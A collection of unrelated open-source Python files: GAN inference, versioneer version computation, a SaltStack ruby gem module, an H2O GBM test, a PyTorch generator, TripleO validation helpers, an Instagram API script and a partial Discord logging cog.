tensor_label_trg_ = fluid.LoDTensor()
tensor_label_org_.set(label_org_tmp, place)
tensor_label_trg_.set(label_trg_tmp, place)
out = exe.run(feed={
"input": real_img,
"label_org_": tensor_label_org_,
"label_trg_": tensor_label_trg_
},
fetch_list=[fake.name])
fake_temp = save_batch_image(out[0])
images.append(fake_temp)
images_concat = np.concatenate(images, 1)
if len(np.array(label_org)) > 1:
images_concat = np.concatenate(images_concat, 1)
imageio.imwrite(
os.path.join(args.output, "fake_img_" + image_name_save), (
(images_concat + 1) * 127.5).astype(np.uint8))
elif args.model_net == 'StarGAN':
test_reader = celeba_reader_creator(
image_dir=args.dataset_dir,
list_filename=args.test_list,
args=args,
mode="VAL")
reader_test = test_reader.make_reader(return_name=True)
py_reader.decorate_batch_generator(
reader_test,
places=fluid.cuda_places() if args.use_gpu else fluid.cpu_places())
for data in py_reader():
real_img, label_org, label_trg, image_name = data[0]['input'], data[
0]['label_org_'], data[0]['label_trg_'], data[0]['image_name']
image_name_save = _compute_start_end(image_name)
real_img_temp = save_batch_image(np.array(real_img))
images = [real_img_temp]
for i in range(args.c_dim):
label_trg_tmp = copy.deepcopy(np.array(label_org))
for j in range(len(np.array(label_org))):
label_trg_tmp[j][i] = 1.0 - label_trg_tmp[j][i]
label_trg_tmp = check_attribute_conflict(
label_trg_tmp, attr_names[i], attr_names)
tensor_label_trg_ = fluid.LoDTensor()
tensor_label_trg_.set(label_trg_tmp, place)
out = exe.run(
feed={"input": real_img,
"label_trg_": tensor_label_trg_},
fetch_list=[fake.name])
fake_temp = save_batch_image(out[0])
images.append(fake_temp)
images_concat = np.concatenate(images, 1)
if len(np.array(label_org)) > 1:
images_concat = np.concatenate(images_concat, 1)
imageio.imwrite(
os.path.join(args.output, "fake_img_" + image_name_save), (
(images_concat + 1) * 127.5).astype(np.uint8))
elif args.model_net == 'Pix2pix' or args.model_net == 'CycleGAN':
test_reader = reader_creator(
image_dir=args.dataset_dir,
list_filename=args.test_list,
shuffle=False,
batch_size=args.n_samples,
mode="VAL")
reader_test = test_reader.make_reader(args, return_name=True)
loader.set_batch_generator(
reader_test,
places=fluid.cuda_places() if args.use_gpu else fluid.cpu_places())
id2name = test_reader.id2name
for data in loader():
real_img, image_name = data[0]['input'], data[0]['image_name']
image_name = id2name[np.array(image_name).astype('int32')[0]]
print("read: ", image_name)
fake_temp = exe.run(fetch_list=[fake.name],
feed={"input": real_img})
fake_temp = np.squeeze(fake_temp[0]).transpose([1, 2, 0])
input_temp = np.squeeze(np.array(real_img)[0]).transpose([1, 2, 0])
imageio.imwrite(
os.path.join(args.output, "fake_" + image_name), (
(fake_temp + 1) * 127.5).astype(np.uint8))
elif args.model_net == 'SPADE':
test_reader = triplex_reader_creator(
image_dir=args.dataset_dir,
list_filename=args.test_list,
shuffle=False,
batch_size=1,
mode="TEST")
id2name = test_reader.id2name
reader_test = test_reader.make_reader(args, return_name=True)
for data in zip(reader_test()):
data_A, data_B, data_C, name = data[0]
name = id2name[np.array(name).astype('int32')[0]]
print("read: ", name)
tensor_A = fluid.LoDTensor()
tensor_C = fluid.LoDTensor()
tensor_A.set(data_A, place)
tensor_C.set(data_C, place)
fake_B_temp = exe.run(
fetch_list=[fake.name],
feed={"input_label": tensor_A,
"input_ins": tensor_C})
fake_B_temp = np.squeeze(fake_B_temp[0]).transpose([1, 2, 0])
input_B_temp = np.squeeze(data_B[0]).transpose([1, 2, 0])
imageio.imwrite(args.output + "/fakeB_" + "_" + name, (
(fake_B_temp + 1) * 127.5).astype(np.uint8))
imageio.imwrite(args.output + "/real_" + "_" + name, (
(input_B_temp + 1) * 127.5).astype(np.uint8))
elif args.model_net == 'CGAN':
noise_data = np.random.uniform(
low=-1.0, high=1.0,
size=[args.n_samples, args.noise_size]).astype('float32')
label = np.random.randint(
0, 9, size=[args.n_samples, 1]).astype('float32')
noise_tensor = fluid.LoDTensor()
conditions_tensor = fluid.LoDTensor()
noise_tensor.set(noise_data, place)
conditions_tensor.set(label, place)
fake_temp = exe.run(
fetch_list=[fake.name],
feed={"noise": noise_tensor,
"conditions": conditions_tensor})[0]
fake_image = np.reshape(fake_temp, (args.n_samples, -1))
fig = utility.plot(fake_image)
plt.savefig(
os.path.join(args.output, 'fake_cgan.png'), bbox_inches='tight')
plt.close(fig)
elif args.model_net == 'DCGAN':
noise_data = np.random.uniform(
low=-1.0, high=1.0,
size=[args.n_samples, args.noise_size]).astype('float32')
noise_tensor = fluid.LoDTensor()
noise_tensor.set(noise_data, place)
fake_temp = exe.run(fetch_list=[fake.name],
feed={"noise": noise_tensor})[0]
fake_image = np.reshape(fake_temp, (args.n_samples, -1))
fig = utility.plot(fake_image)
plt.savefig(
os.path.join(args.output, 'fake_dcgan.png'), bbox_inches='tight')
plt.close(fig)
else:
raise NotImplementedError("model_net {} is not support".format(
args.model_net))
if __name__ == "__main__":
args = parser.parse_args()
print_arguments(args)
check_gpu(args.use_gpu)
check_version()
infer(args)
|
the-stack_106_15892
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = "dask-mpi-"
cfg.versionfile_source = "dask_mpi/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen(
[c] + args,
cwd=cwd,
env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr else None),
)
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {
"version": dirname[len(parentdir_prefix) :],
"full-revisionid": None,
"dirty": False,
"error": None,
"date": None,
}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print(
"Tried directories %s but none started with prefix %s"
% (str(rootdirs), parentdir_prefix)
)
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG) :] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "main".
tags = set([r for r in refs if re.search(r"\d", r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix) :]
if verbose:
print("picking %s" % r)
return {
"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": None,
"date": date,
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {
"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": "no suitable tags",
"date": None,
}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(
GITS,
[
"describe",
"--tags",
"--dirty",
"--always",
"--long",
"--match",
"%s*" % tag_prefix,
],
cwd=root,
)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[: git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r"^(.+)-(\d+)-g([0-9a-f]+)$", git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = "unable to parse git-describe output: '%s'" % describe_out
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = "tag '%s' doesn't start with prefix '%s'" % (
full_tag,
tag_prefix,
)
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix) :]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[
0
].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {
"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None,
}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {
"version": rendered,
"full-revisionid": pieces["long"],
"dirty": pieces["dirty"],
"error": None,
"date": pieces.get("date"),
}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split("/"):
root = os.path.dirname(root)
except NameError:
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None,
}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to compute version",
"date": None,
}
|
the-stack_106_15893
|
'''
Manage ruby gems.
'''
# Import python libs
import re
def _gem(command, ruby=None, runas=None):
cmdline = 'gem {command}'.format(command=command)
if __salt__['rvm.is_installed']():
return __salt__['rvm.do'](ruby, cmdline, runas=runas)
ret = __salt__['cmd.run_all'](
cmdline,
runas=runas
)
if ret['retcode'] == 0:
return ret['stdout']
else:
return False
def install(gems, ruby=None, runas=None, version=None, rdoc=False, ri=False):
'''
Installs one or several gems.
gems
The gems to install.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
version : None
Specify the version to install for the gem.
Doesn't play nice with multiple gems at once
rdoc : False
Generate RDoc documentation for the gem(s).
ri : False
Generate RI documentation for the gem(s).
'''
options = ''
if version:
options += ' --version {0}'.format(version)
if not rdoc:
options += ' --no-rdoc'
if not ri:
options += ' --no-ri'
return _gem('install {gems} {options}'.format(gems=gems, options=options), ruby, runas=runas)
def uninstall(gems, ruby=None, runas=None):
'''
Uninstall one or several gems.
gems
The gems to uninstall.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('uninstall {gems}'.format(gems=gems), ruby, runas=runas)
def update(gems, ruby=None, runas=None):
'''
Update one or several gems.
gems
The gems to update.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('update {gems}'.format(gems=gems), ruby, runas=runas)
def update_system(version='', ruby=None, runas=None):
'''
Update rubygems.
version : (newest)
The version of rubygems to install.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('update --system {version}'.
format(version=version), ruby, runas=runas)
def list(prefix='', ruby=None, runas=None):
'''
List locally installed gems.
prefix :
Only list gems when the name matches this prefix.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
gems = {}
stdout = _gem('list {prefix}'.format(prefix=prefix),
ruby, runas=runas)
lines = []
if isinstance(stdout, str):
lines = stdout.splitlines()
for line in lines:
m = re.match('^([^ ]+) \((.+)\)', line)
if m:
gem = m.group(1)
versions = m.group(2).split(', ')
gems[gem] = versions
return gems
def sources_add(source_uri, ruby=None, runas=None):
'''
Add a gem source.
source_uri
The source URI to add.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('sources --add {source_uri}'.
format(source_uri=source_uri), ruby, runas=runas)
def sources_remove(source_uri, ruby=None, runas=None):
'''
Remove a gem source.
source_uri
The source URI to remove.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('sources --remove {source_uri}'.
format(source_uri=source_uri), ruby, runas=runas)
def sources_list(ruby=None, runas=None):
'''
List the configured gem sources.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('sources', ruby, runas=runas).splitlines()[2:]
|
the-stack_106_15894
|
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gbm import H2OGradientBoostingEstimator
def distribution_behavior_gbm():
eco = h2o.import_file(path=pyunit_utils.locate("smalldata/gbm_test/ecology_model.csv"))
# 0/1 response: expect gaussian
eco_model = H2OGradientBoostingEstimator()
eco_model.train(x=range(2,13), y="Angaus", training_frame=eco)
# more than 2 integers for response: expect gaussian
cars = h2o.import_file(path=pyunit_utils.locate("smalldata/junit/cars.csv"))
cars_model = H2OGradientBoostingEstimator()
cars_model.train(x=range(3,7),y="cylinders", training_frame=cars)
# 0/1 response: expect gaussian
eco_model = H2OGradientBoostingEstimator(distribution="gaussian")
eco_model.train(x=range(2,13), y="Angaus", training_frame=eco)
# character response: expect error
try:
eco_model.train(x=range(1,8), y="Method", training_frame=eco)
assert False, "expected an error"
except EnvironmentError:
assert True
# 0/1 response: expect bernoulli
eco_model = H2OGradientBoostingEstimator(distribution="bernoulli")
eco["Angaus"] = eco["Angaus"].asfactor()
eco_model.train(x=range(2,13), y="Angaus", training_frame=eco)
# 2 level character response: expect bernoulli
tree = h2o.import_file(path=pyunit_utils.locate("smalldata/junit/test_tree_minmax.csv"))
tree_model=eco_model
tree_model.min_rows = 1
tree_model.train(range(3),y="response",training_frame=tree)
# more than two integers for response: expect error
try:
cars_mod = H2OGradientBoostingEstimator(distribution="bernoulli")
cars_mod.train(x=range(3,7), y="cylinders", training_frame=cars)
assert False, "expected an error"
except EnvironmentError:
assert True
# more than two character levels for response: expect error
try:
eco_model = H2OGradientBoostingEstimator(distribution="bernoulli")
eco_model.train(x=range(8), y="Method", training_frame=eco)
assert False, "expected an error"
except EnvironmentError:
assert True
#Log.info("==============================")
#Log.info("Multinomial Behavior")
#Log.info("==============================")
# more than two integers for response: expect multinomial
cars["cylinders"] = cars["cylinders"].asfactor()
cars_model = H2OGradientBoostingEstimator(distribution="multinomial")
cars_model.train(range(3,7), y="cylinders", training_frame=cars)
cars_model = H2OGradientBoostingEstimator(distribution="multinomial")
cars_model.train(x=range(3,7), y="cylinders", training_frame=cars)
# more than two character levels for response: expect multinomial
eco_model = H2OGradientBoostingEstimator(distribution="multinomial")
eco_model.train(x=range(8), y="Method", training_frame=eco)
if __name__ == "__main__":
pyunit_utils.standalone_test(distribution_behavior_gbm)
else:
distribution_behavior_gbm()
|
the-stack_106_15895
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
from models.generators.resblocks import Block
class ResNetGenerator(nn.Module):
"""Generator generates 64x64."""
def __init__(self, num_features=64, dim_z=128, bottom_width=4,
activation=F.relu, num_classes=0, distribution='normal'):
super(ResNetGenerator, self).__init__()
self.num_features = num_features
self.dim_z = dim_z
self.bottom_width = bottom_width
self.activation = activation
self.num_classes = num_classes
self.distribution = distribution
self.l1 = nn.Linear(dim_z, 16 * num_features * bottom_width ** 2)
self.block2 = Block(num_features * 16, num_features * 8,
activation=activation, upsample=True,
num_classes=num_classes)
self.block3 = Block(num_features * 8, num_features * 4,
activation=activation, upsample=True,
num_classes=num_classes)
self.block4 = Block(num_features * 4, num_features * 2,
activation=activation, upsample=True,
num_classes=num_classes)
self.block5 = Block(num_features * 2, num_features,
activation=activation, upsample=True,
num_classes=num_classes)
self.b6 = nn.BatchNorm2d(num_features)
self.conv6 = nn.Conv2d(num_features, 3, 1, 1)
def _initialize(self):
init.xavier_uniform_(self.l1.weight.tensor)
init.xavier_uniform_(self.conv7.weight.tensor)
def forward(self, z, y=None, **kwargs):
h = self.l1(z).view(z.size(0), -1, self.bottom_width, self.bottom_width)
for i in range(2, 6):
h = getattr(self, 'block{}'.format(i))(h, y, **kwargs)
h = self.activation(self.b6(h))
return torch.tanh(self.conv6(h))
|
the-stack_106_15896
|
# Copyright 2016 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import logging
import os
import re
import tempfile
import yaml
from oslo_concurrency import processutils
from tripleo_workflows import constants
LOG = logging.getLogger(__name__)
DEFAULT_METADATA = {
'name': 'Unnamed',
'description': 'No description',
'stage': 'No stage',
'groups': [],
}
def get_validation_metadata(validation, key):
try:
return validation[0]['vars']['metadata'][key]
except KeyError:
return DEFAULT_METADATA.get(key)
except TypeError:
LOG.exception("Failed to get validation metadata.")
def load_validations(groups=None):
'''Loads all validations.'''
paths = glob.glob('{}/*.yaml'.format(constants.DEFAULT_VALIDATIONS_PATH))
results = []
for validation_path in sorted(paths):
with open(validation_path) as f:
validation = yaml.safe_load(f.read())
validation_groups = get_validation_metadata(validation, 'groups') \
or []
if not groups or \
set.intersection(set(groups), set(validation_groups)):
results.append({
'id': os.path.splitext(
os.path.basename(validation_path))[0],
'name': get_validation_metadata(validation, 'name'),
'groups': get_validation_metadata(validation, 'groups'),
'description': get_validation_metadata(validation,
'description'),
'metadata': get_remaining_metadata(validation)
})
return results
def get_remaining_metadata(validation):
try:
return {k: v for k, v in validation[0]['vars']['metadata'].items()
if k not in ['name', 'description', 'groups']}
except KeyError:
return dict()
def find_validation(validation):
return '{}/{}.yaml'.format(constants.DEFAULT_VALIDATIONS_PATH, validation)
def run_validation(validation, identity_file, plan, context):
return processutils.execute(
'/usr/bin/sudo', '-u', 'validations',
'OS_AUTH_URL={}'.format(context.auth_uri),
'OS_USERNAME={}'.format(context.user_name),
'OS_AUTH_TOKEN={}'.format(context.auth_token),
'OS_TENANT_NAME={}'.format(context.project_name),
'/usr/bin/run-validation',
find_validation(validation),
identity_file,
plan
)
def write_identity_file(key):
"""Write the SSH private key to disk"""
fd, path = tempfile.mkstemp(prefix='validations_identity_')
LOG.debug('Writing SSH key to disk at %s', path)
with os.fdopen(fd, 'w') as tmp:
tmp.write(key)
processutils.execute('/usr/bin/sudo', '/usr/bin/chown', '-h',
'validations:', path)
return path
def cleanup_identity_file(path):
"""Remove the SSH private key from disk"""
LOG.debug('Cleaning up identity file at %s', path)
processutils.execute('/usr/bin/sudo', '/usr/bin/rm', '-f', path)
def pattern_validator(pattern, value):
LOG.debug('Validating %s with pattern %s', value, pattern)
if not re.match(pattern, value):
return False
return True
|
the-stack_106_15899
|
import os
from instauto.api.client import ApiClient
from instauto.api.actions import post as ps
from instauto.api.actions import search as se
if __name__ == '__main__':
if os.path.isfile('./.instauto.save'):
client = ApiClient.initiate_from_file('./.instauto.save')
else:
client = ApiClient(username=os.environ.get("INSTAUTO_USER") or "your_username", password=os.environ.get("INSTAUTO_PASS") or "your_password")
client.log_in()
client.save_to_disk('./.instauto.save')
s = se.Tag('instagram', 1)
resp = client.search_tag(s).json()
results = resp['results'][0]
tag_name = results['name']
rbt = ps.RetrieveByTag(tag_name)
obj, result = client.post_retrieve_by_tag(rbt)
retrieved_items = []
# retrieve the first 20 posts
while result and len(retrieved_items) < 20:
retrieved_items.extend(result)
obj, result = client.post_retrieve_by_tag(obj)
print(f"Retrieved {len(result)} new posts!")
print(f"Retrieved a total of {len(retrieved_items)} posts!")
|
the-stack_106_15900
|
import sys
import traceback
from typing import Any
import discord
from discord.ext import commands
from discord.ext.commands import errors
import bot_config
import errors as cerrors
import functions
class Logging(commands.Cog):
"""Handle logging stuff"""
def __init__(
self,
bot: commands.Bot
) -> None:
self.bot = bot
@commands.Cog.listener()
async def on_guild_join(
self,
guild: discord.Guild
) -> None:
support_server = self.bot.get_guild(
bot_config.SUPPORT_SERVER_ID
)
log_channel = discord.utils.get(
support_server.channels,
id=bot_config.SERVER_LOG_ID
)
members = guild.member_count
total = 0
for g in self.bot.guilds:
try:
total += g.member_count
except AttributeError:
pass
embed = discord.Embed(
description=f"Joined **{guild.name}**!\n"
f"**{members}** Members",
color=bot_config.GUILD_JOIN_COLOR
)
embed.set_footer(
text=f"We now have {len(self.bot.guilds)} servers and "
f"{total} users"
)
await log_channel.send(embed=embed)
@commands.Cog.listener()
async def on_guild_remove(
self,
guild: discord.Guild
) -> None:
support_server = self.bot.get_guild(
bot_config.SUPPORT_SERVER_ID
)
log_channel = discord.utils.get(
support_server.channels,
id=bot_config.SERVER_LOG_ID
)
members = guild.member_count
total = 0
for g in self.bot.guilds:
try:
total += g.member_count
except AttributeError:
pass
